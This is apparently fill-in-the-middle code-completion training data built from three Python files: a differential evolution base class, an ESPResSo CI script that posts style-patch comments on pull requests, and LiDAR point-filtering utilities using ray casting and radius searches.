def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | __init__ |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def <|fim_middle|>(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | set_amount_of_individuals |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def <|fim_middle|>(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | set_params |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def <|fim_middle|>(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | set_end_method |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def <|fim_middle|>(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | create_population |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_indi<|fim_middle|># Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | vidual(self):
|
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self<|fim_middle|>im, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | , func, d |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
<|fim_middle|>return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim_middle|><|fim▁end|> | |
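The long run of DifferentialEvolutionAbstract.py rows masks different spans of the same base class, whose iteration and optimize methods are deliberate stubs for subclasses. The sketch below exercises only the implemented parts; the sphere objective, the manual dim assignment and the import path are illustrative assumptions:

```python
import numpy
from DifferentialEvolutionAbstract import DifferentialEvolutionAbstract  # module shown above

de = DifferentialEvolutionAbstract(min_element=-5, max_element=5)
de.set_amount_of_individuals(20)
de.set_params(f=0.8, p=0.7)
de.dim = 3                                    # assumed here; normally set during optimize()

de.population = de.create_population()         # ndarray of shape (20, 3)
sphere = lambda v: float(numpy.sum(v ** 2))    # illustrative objective to minimise
de.func_population = numpy.array([sphere(ind) for ind in de.population])
print(de.choose_best_individual())             # individual with the smallest objective value
```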
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'<|fim▁hole|>MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)<|fim▁end|> |
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
|
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
<|fim_middle|>
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)
<|fim▁end|> | print("Not a pull request. Exiting now.")
exit(0) |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
<|fim_middle|>
<|fim▁end|> | patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment) |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
<|fim_middle|>
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)
<|fim▁end|> | comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes' |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
<|fim_middle|>
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)
<|fim▁end|> | comment = 'To fix this' |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
<|fim_middle|>
<|fim▁end|> | assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment) |
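The gh_post_style_patch.py rows encode one small decision worth isolating: a diff of at most SIZELIMIT bytes is quoted inline, with backticks escaped so they cannot break the fenced diff, while a larger diff only gets the shorter link wording. A standalone sketch of that branch with a fake patch; the backtick run is assembled at runtime purely so this example stays self-contained:

```python
SIZELIMIT = 10000
FENCE = "`" * 3  # three backticks, built at runtime to keep this example block intact

def comment_header(patch: bytes) -> str:
    """Mirror the inline-diff vs. link-only choice from the rows above."""
    if len(patch) <= SIZELIMIT:
        header = "Specifically, I suggest you make the following changes:"
        header += "\n" + FENCE + "diff\n"
        header += patch.decode("utf-8").replace("`", r"\`").strip()
        header += "\n" + FENCE + "\n"
        header += "To apply these changes"
    else:
        header = "To fix this"
    return header

print(comment_header(b"--- a/x.py\n+++ b/x.py\n@@\n-a=1\n+a = 1\n"))
```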
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon<|fim▁hole|> pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts<|fim▁end|> | # This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False): |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
<|fim_middle|>
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. Target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
